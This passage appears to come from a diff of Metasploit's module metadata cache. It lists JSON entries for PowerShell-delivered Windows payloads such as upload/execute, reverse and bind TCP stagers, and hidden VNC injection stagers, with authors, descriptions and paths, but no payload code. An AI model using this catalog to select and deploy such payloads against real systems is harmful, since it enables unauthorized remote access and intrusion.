"cmd/windows/powershell/upexec/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/bind_nonx_tcp", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_cmd/windows/powershell/upexec/bind_tcp": { - "name": "Powershell Exec, Windows Upload/Execute, Bind TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/upexec/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/bind_tcp", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_tcp" - }, - "payload_cmd/windows/powershell/upexec/bind_tcp_rc4": { - "name": "Powershell Exec, Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/upexec/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/upexec/bind_tcp_uuid": { - "name": "Powershell Exec, Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/upexec/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/upexec/find_tag": { - "name": "Powershell Exec, Windows Upload/Execute, Find Tag Ordinal Stager", - "fullname": "payload/cmd/windows/powershell/upexec/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nUse an established connection", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/find_tag", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/findtag_ord" - }, - "payload_cmd/windows/powershell/upexec/reverse_ipv6_tcp": { - "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/windows/powershell/upexec/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker over IPv6", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_cmd/windows/powershell/upexec/reverse_nonx_tcp": { - "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/upexec/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker (No NX)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/reverse_nonx_tcp", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_cmd/windows/powershell/upexec/reverse_ord_tcp": { - "name": "Powershell Exec, Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/upexec/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "spoonm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/reverse_ord_tcp", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_cmd/windows/powershell/upexec/reverse_tcp": { - "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/upexec/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/reverse_tcp", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_tcp" - }, - "payload_cmd/windows/powershell/upexec/reverse_tcp_allports": { - "name": "Powershell Exec, Windows Upload/Execute, Reverse All-Port TCP Stager", - "fullname": "payload/cmd/windows/powershell/upexec/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/reverse_tcp_allports", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_cmd/windows/powershell/upexec/reverse_tcp_dns": { - "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (DNS)", - "fullname": "payload/cmd/windows/powershell/upexec/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/reverse_tcp_dns", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_cmd/windows/powershell/upexec/reverse_tcp_rc4": { - "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/upexec/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/upexec/reverse_tcp_rc4_dns": { - "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/cmd/windows/powershell/upexec/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/reverse_tcp_rc4_dns", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_cmd/windows/powershell/upexec/reverse_tcp_uuid": { - "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/upexec/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/upexec/reverse_udp": { - "name": "Powershell Exec, Windows Upload/Execute, Reverse UDP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/upexec/reverse_udp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "vlad902 ", - "sf ", - "RageLtMan " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/upexec/reverse_udp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/upexec/reverse_udp", - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_udp" - }, - "payload_cmd/windows/powershell/vncinject/bind_hidden_ipknock_tcp": { - "name": "Powershell Exec, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/cmd/windows/powershell/vncinject/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection", - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/bind_hidden_ipknock_tcp", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_cmd/windows/powershell/vncinject/bind_hidden_tcp": { - "name": "Powershell Exec, Hidden Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/vncinject/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection", - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/bind_hidden_tcp", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_cmd/windows/powershell/vncinject/bind_ipv6_tcp": { - "name": "Powershell Exec, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/vncinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/vncinject/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/vncinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/vncinject/bind_named_pipe": { - "name": "Powershell Exec, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/vncinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "UserExistsError" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_cmd/windows/powershell/vncinject/bind_nonx_tcp": { - "name": "Powershell Exec, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/vncinject/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/bind_nonx_tcp", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_cmd/windows/powershell/vncinject/bind_tcp": { - "name": "Powershell Exec, Bind TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/vncinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/bind_tcp", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_tcp" - }, - "payload_cmd/windows/powershell/vncinject/bind_tcp_rc4": { - "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/vncinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/vncinject/bind_tcp_uuid": { - "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/vncinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/vncinject/find_tag": { - "name": "Powershell Exec, Find Tag Ordinal Stager", - "fullname": "payload/cmd/windows/powershell/vncinject/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/find_tag", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/findtag_ord" - }, - "payload_cmd/windows/powershell/vncinject/reverse_http": { - "name": "Powershell Exec, Windows Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/powershell/vncinject/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - 